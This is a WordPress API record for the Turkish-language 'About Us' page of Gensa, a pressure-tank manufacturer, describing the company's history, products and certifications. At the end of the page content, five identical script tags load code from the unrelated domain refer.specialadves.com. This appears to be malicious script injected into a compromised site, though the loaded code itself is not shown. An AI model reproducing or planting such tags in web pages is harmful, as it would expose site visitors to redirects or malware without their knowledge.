{"id":14,"date":"2020-04-19T17:05:09","date_gmt":"2020-04-19T17:05:09","guid":{"rendered":"http:\/\/nilethemes.com\/wordpress\/maj\/?page_id=14"},"modified":"2021-04-13T14:34:35","modified_gmt":"2021-04-13T11:34:35","slug":"hakkimizda","status":"publish","type":"page","link":"http:\/\/gensalimited.com.tr\/index.php\/hakkimizda\/","title":{"rendered":"Hakk\u0131m\u0131zda"},"content":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;680&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;]<h5   style=\"font-size: 20px; font-weight: 700; letter-spacing: -.5px; line-height: 25px; text-align: left; color: #eb8337;\" class=\"\">Gensa Bas\u0131n\u00e7 Tanklar\u0131<\/h5><h2   style=\"font-size: 43px; font-weight: 700; letter-spacing: -1px; line-height: 47px; text-align: left; color: #000000;\" class=\"\">Hakk\u0131m\u0131zda<\/h2><h2   style=\"font-size: 17px; font-weight: 400; letter-spacing: -0.5px; line-height: 32px; text-align: left; color: #444444;\" class=\" vc_custom_1618235598244\">1985 y\u0131l\u0131nda Ankara Ostim'de ilk imalat\u0131na ba\u015flayan GENSA BASIN\u00c7 TANKLARI, ilk g\u00fcn\u00fcnden beri, sekt\u00f6r\u00fcn ihtiyac\u0131 olan end\u00fcstriyel bas\u0131n\u00e7l\u0131 ekipmanlar\u0131 kaliteli ve \u00f6zenle yapmaya devam etmektedir.<br \/>\nSon y\u0131llarda faaliyet ve yat\u0131r\u0131mlar\u0131n\u0131 h\u0131zland\u0131rarak Ar-Ge \u00e7al\u0131\u015fmalar\u0131 neticesinde fason \u00fcretimden, \u00f6zg\u00fcn imalata ge\u00e7i\u015f sa\u011flamak i\u00e7in \u00e7al\u0131\u015fmalar t\u00fcm h\u0131z\u0131yla s\u00fcrmektedir. Yeni imalat yeri olan 2000m2 kapal\u0131 \u00e7al\u0131\u015fma alan\u0131nda \u00fcretimlerini; hava tank\u0131, LPG tank\u0131, su tank\u0131, yak\u0131t tank\u0131, denge tank\u0131, azot tank\u0131 ve bas\u0131n\u00e7l\u0131-bas\u0131n\u00e7s\u0131z \u00f6zel proje i\u015flerini t\u00fcm ince noktalar\u0131 dikkate alarak yapmaktad\u0131r. Firmam\u0131z hava tank\u0131 imalat standard\u0131 olarak EN-13445 serisi(PED),LPG tank standard\u0131 olarakta EN-12542 \/ EN-13445 standartlar\u0131n\u0131 yorumlay\u0131p, uygulamaya koyarak CE'li \u00fcretimiyle m\u00fc\u015fterilerini memnun etmeyi s\u00fcrd\u00fcrmektedir.<br \/>\nUzman \u00fcretim-motaj ekibi ve idari personelleriyle toplamda 15 ki\u015fi olarak yeni fabrikas\u0131nda, m\u00fc\u015fteri memnunniyetini as\u0131l de\u011fer g\u00f6ren firma,\u00fcr\u00fcnlerinde kalite ve g\u00fcvenlik ilkeleri ile fark olu\u015fturmu\u015ftur.<\/h2>[\/vc_column][\/vc_row]<script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;680&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][\/vc_column][\/vc_row]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/home-blank.php","meta":{"inline_featured_image":false,"footnotes":""},"class_list":["post-14","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/14","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/comments?post=14"}],"version-history":[{"count":5,"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/14\/revisions"}],"predecessor-version":[{"id":875,"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/14\/revisions\/875"}],"wp:attachment":[{"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/media?parent=14"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}